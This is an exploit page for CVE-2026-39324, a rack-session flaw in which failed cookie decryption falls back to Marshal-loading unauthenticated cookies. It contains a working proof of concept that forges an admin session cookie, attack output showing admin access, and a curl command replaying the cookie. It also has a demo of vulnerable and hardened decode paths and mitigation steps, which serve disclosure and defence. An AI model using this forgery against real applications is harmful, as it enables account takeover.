## https://sploitus.com/exploit?id=35C5AAD4-3968-51F1-9C7C-1421706507CC
# CVE-2026-39324

**Rack::Session::Cookie decrypt failure falls back to accepting unencrypted cookies**

|  |  |
|--|--|
| Advisory | [GHSA-33qg-7wpp-89cq](https://github.com/rack/rack-session/security/advisories/GHSA-33qg-7wpp-89cq) |
| Package | rack-session (RubyGems) |
| Affected | |

**1) Attacker builds the forged cookie (no secret required):**
```ruby
require "base64"

# Plain Base64(Marshal) blob: no encryption, no HMAC, nothing derived from the server secret.
payload = { "session_id" => "attacker-forged", "user_id" => 2 }
cookie  = Base64.strict_encode64(Marshal.dump(payload))
```

**2) Server-side flow when it receives the forged cookie:**
```
encryptor #1 decrypt → HMAC invalid
encryptor #2 decrypt → HMAC invalid
fallback → coder.decode() → Marshal.load → attacker session accepted
→ session["user_id"] = 2 → admin user resolved → 200 OK
```

### Output

```
$ ruby attack.rb
--- CVE-2026-39324: Session Forgery ---
Target:  http://127.0.0.1:9416
Payload: {"session_id" => "attacker-forged", "user_id" => 2}
Cookie:  rack.session=BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiFGF0dGFja2VyLWZvcmdlZAY7AFRJIgx1c2VyX2lkBjsAVGkH

Session cookie encryptor error: HMAC is invalid   ← encryptor #1 failed
Session cookie encryptor error: HMAC is invalid   ← encryptor #2 failed, but cookie not rejected
Status: 200
Body:   {"status" => "ok", "message" => "admin panel", "session_hash" => {"session_id" => "attacker-forged", "user_id" => 2}, "current_user" => {"id" => 2, "email" => "admin@example.test", "admin" => true}}

[!] VULNERABLE — forged user_id=2 accepted, admin access granted.
```

Both HMAC checks fail and both failures are logged, yet the cookie is not rejected: the legacy coder Marshal-loads the raw cookie value, the forged `user_id` becomes the session identity, and the attacker is served the admin panel. The configured secrets never enter into the decision, so the HMAC check is effectively a no-op for any cookie an attacker writes themselves.
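To make the failure mode concrete, here is an added example (not rack-session's code and not the PoC author's) that models the decode path described above, with the vulnerable fallback next to a hardened version. The encryptor stand-in only authenticates with HMAC-SHA256 rather than encrypting, which is enough to show the accept/reject decision; every name (`SessionCookieDemo`, `TagAuthenticator`, `MarshalCoder`, `unpack_vulnerable`, `unpack_hardened`) is invented for the demo, and the cookies it builds are constructed inline.

```ruby
require "openssl"

# Added example, not rack-session's code: a minimal model of the decode flow
# described on this page. Names and cookie layout are invented for the demo.
module SessionCookieDemo
  class EncryptorError < StandardError; end

  # Stand-in for the gem's encryptor: authenticates a cookie body with
  # HMAC-SHA256. Cookie layout (invented): "<strict Base64 body>--<hex tag>".
  class TagAuthenticator
    def initialize(secret)
      @secret = secret
    end

    def encode(body)
      "#{body}--#{tag_for(body)}"
    end

    # Returns the authenticated body, or raises the way the gem's log line reports.
    def decode(cookie)
      body, tag = cookie.to_s.split("--", 2)
      expected = tag_for(body)
      raise EncryptorError, "HMAC is invalid" unless tag && OpenSSL.secure_compare(tag, expected)
      body
    end

    private

    def tag_for(body)
      OpenSSL::HMAC.hexdigest("SHA256", @secret, body.to_s)
    end
  end

  # Stand-in for the legacy Base64+Marshal coder: it trusts its input completely,
  # so whatever reaches it is treated as a genuine session.
  class MarshalCoder
    def encode(session)
      [Marshal.dump(session)].pack("m0")
    end

    def decode(str)
      Marshal.load(str.to_s.unpack1("m0"))
    rescue StandardError
      nil
    end
  end

  # Vulnerable path: each encryptor is tried and its failure logged, but when
  # all of them fail the raw cookie is still handed to the coder.
  def self.unpack_vulnerable(cookie, encryptors, coder, errors = [])
    encryptors.each do |enc|
      begin
        return coder.decode(enc.decode(cookie)) || {}
      rescue EncryptorError => e
        errors << "Session cookie encryptor error: #{e.message}"
      end
    end
    coder.decode(cookie) || {} # the fallback: unauthenticated Base64(Marshal) accepted
  end

  # Hardened path: the legacy coder is only consulted when no secrets are
  # configured at all; otherwise a cookie nobody authenticates starts a fresh session.
  def self.unpack_hardened(cookie, encryptors, coder, errors = [])
    encryptors.each do |enc|
      begin
        return coder.decode(enc.decode(cookie)) || {}
      rescue EncryptorError => e
        errors << "Session cookie encryptor error: #{e.message}"
      end
    end
    return coder.decode(cookie) || {} if encryptors.empty?
    {}
  end
end

if __FILE__ == $0
  coder      = SessionCookieDemo::MarshalCoder.new
  encryptors = [SessionCookieDemo::TagAuthenticator.new("current-secret"),
                SessionCookieDemo::TagAuthenticator.new("old-secret")]

  # Constructed attacker cookie: Base64(Marshal) with no tag, as in the PoC above.
  forged = coder.encode({ "session_id" => "attacker-forged", "user_id" => 2 })
  errors = []
  p SessionCookieDemo.unpack_vulnerable(forged, encryptors, coder, errors) # forged session accepted
  puts errors                                                              # two "HMAC is invalid" lines
  p SessionCookieDemo.unpack_hardened(forged, encryptors, coder)           # {} : rejected

  # Constructed legitimate cookie, tagged with the old secret (rotation still works).
  legit = encryptors[1].encode(coder.encode({ "user_id" => 1 }))
  p SessionCookieDemo.unpack_hardened(legit, encryptors, coder)            # {"user_id"=>1}
end
```

The hardened variant keeps the one case the fallback was presumably meant for (an app with no secrets configured at all) and closes the other: once any secret exists, the coder is never reached without an encryptor vouching for the bytes. That ordering matters twice over here, because the legacy coder is `Marshal`, and `Marshal.load` on attacker-controlled bytes is a deserialization risk in its own right, not just a session-forgery one.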

### curl

```bash
ruby -rbase64 -e 'puts Base64.strict_encode64(Marshal.dump({"user_id"=>2}))'
# → BAh7BkkiDHVzZXJfaWQGOgZFVGkH

curl http://127.0.0.1:9416/admin -H 'Cookie: rack.session=BAh7BkkiDHVzZXJfaWQGOgZFVGkH'
```

## Mitigation

1. Update `rack-session` to >= 2.1.2.
2. Rotate the session secret (and retire any `old_secret`) after updating: forged sessions may have been accepted and re-issued as legitimate, encrypted cookies before the patch.
3. Check `rack.errors` output for `Session cookie encryptor error: HMAC is invalid` lines. On an unpatched host they are the only server-side trace of a forged cookie being accepted, so a burst of them against sensitive endpoints deserves an investigation rather than a log-noise filter.